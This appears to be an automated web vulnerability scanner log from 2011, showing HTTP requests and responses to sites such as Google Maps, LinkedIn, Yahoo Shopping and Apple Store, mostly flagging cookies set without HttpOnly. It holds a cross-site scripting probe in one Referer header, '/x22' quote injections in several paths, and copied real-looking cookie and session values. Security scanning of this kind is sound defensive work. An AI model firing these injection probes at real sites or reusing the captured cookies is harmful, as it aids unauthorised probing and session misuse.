GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1 Accept: */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?vp=jpc403475513 HTTP/1.1 Host: mobile.jackpotcity.com Proxy-Connection: keep-alive Referer: http://www.jackpotcity.com/online-casino/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ If-None-Match: "J18332:E0-293462370-1296766279068"
Response
HTTP/1.1 200 OK Connection: close Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Content-Type: application/x-javascript ETag: "J18338:E0-293462370-1296766279068" Cache-Control: private, no-transform, max-age=600 Expires: Fri, 04 Feb 2011 02:33:00 GMT Content-Length: 159 Date: Fri, 04 Feb 2011 02:23:00 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1 Host: qa.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/ Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:33:42 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: qooxdoo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /schhp HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://scholar.google.com/schhp? ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search;_ylc=X3oDMTE4aHZtZGtyBF9TAzc4NDcxODMyNQRrA2FiYyBkZXZlbG9wbWVudARzZWMDdGl0bGU-?p=abc+development&sem=google/x22 HTTP/1.1 Host: shopping.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:33:45 GMT Set-Cookie: B=eso7aa56km499&b=3&s=7m; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: SHOPSEMAFFILIATE=sem=google/x22; expires=Thu, 03-Feb-2011 21:03:45 GMT; path=/; domain=.shopping.yahoo.com Cache-Control: private Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 105590
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=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; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us-hed/findyourschool HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="en-us en us" lang="en-US"> <head> <meta name="viewport" content="width=1024" />
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us-hed/go/home HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=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; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us_smb_78313 HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:32:32 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 20:32:32 GMT Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www354 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www379 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www298 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
